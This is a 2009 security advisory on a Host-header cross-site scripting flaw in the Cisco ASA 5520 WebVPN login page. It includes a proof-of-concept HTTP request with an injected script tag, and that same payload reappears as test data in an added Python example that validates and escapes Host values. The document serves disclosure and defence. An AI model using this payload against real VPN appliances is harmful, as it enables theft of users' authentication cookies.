Written by Bugs NotHugs
Tuesday, 31 March 2009 22:39
Cisco ASA Appliance WebVPN Cross Site Scripting Vulnerability
- Bugtraq ID: 34307
- Class: Input Validation Error
- CVE:
- Remote: Yes
- Local: No
- Published: Mar 31 2009 12:00AM
- Updated: Mar 31 2009 05:16PM
- Credit: Bugs NotHugs
- Vulnerable: Cisco ASA 5520 0
Discussion: Cisco ASA is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Cisco ASA 5520 running IOS 7.2(2)22 is vulnerable; other versions may also be affected.
Exploit(s)/PoC(s): An attacker can exploit this issue by enticing an unsuspecting victim to follow a malicious HTTP request.
The following example is available (34307.txt):

POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv="" content='"www.example.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://www.example.com/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
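The root cause above is a Host header value being echoed into the login page without validation or encoding. As an added defensive example (not part of the advisory and not Cisco's code), the following Python shows the two controls that stop this class of bug: reject a Host value that does not parse as a hostname from an allowlist, and HTML-escape anything that must still be reflected. The request text and the hostname `vpn.example.org` are constructed for the example.

```python
import html
import re

# RFC 1123 label grammar; a Host value is one or more labels plus an
# optional port. Quotes, angle brackets and spaces can never match, so the
# PoC value from the advisory is rejected before it reaches any template.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOST_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}(?::\d{{1,5}})?$", re.IGNORECASE)


def parse_headers(raw_request: str) -> dict:
    """Return the headers of a raw HTTP/1.x request as a lower-cased dict."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.splitlines()[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def check_host(raw_request: str, allowed_hosts: set) -> str:
    """Classify the Host header as 'ok', 'missing', 'malformed' or 'unexpected'.

    Anything other than 'ok' should be answered with a generic error page
    that does not echo the offending value.
    """
    host = parse_headers(raw_request).get("host")
    if host is None:
        return "missing"
    if not _HOST_RE.match(host):
        return "malformed"
    if host.rsplit(":", 1)[0].lower() not in allowed_hosts:
        return "unexpected"
    return "ok"


def safe_reflect(value: str) -> str:
    """HTML-escape a value (including quotes) before embedding it in markup."""
    return html.escape(value, quote=True)


# Constructed sample requests: the Host value from the advisory's PoC, and a benign one.
POC_HOST = "\"'><script>alert('BugsNotHugs')</script><meta httpequiv=\"\" content='\"www.example.org"
POC_REQUEST = f"POST /+webvpn+/index.html HTTP/1.1\r\nHost: {POC_HOST}\r\nCookie: webvpnlogin=1\r\n\r\n"
GOOD_REQUEST = "GET /+webvpn+/index.html HTTP/1.1\r\nHost: vpn.example.org:443\r\n\r\n"

if __name__ == "__main__":
    allowed = {"vpn.example.org"}
    print(check_host(POC_REQUEST, allowed))  # malformed
    print(check_host(GOOD_REQUEST, allowed))  # ok
    print(safe_reflect(POC_HOST))  # no raw < > " ' left to break out of an attribute
```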
Solution: Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [e-mail address elided].
References:
- ASA Product Page (Cisco)
- Cisco ASA5520 Web VPN Host Header XSS (Cisco)
- Cisco ASA5520 Web VPN Host Header XSS, http://www.securityfocus.com/archive/1/50231 (Bugs NotHugs)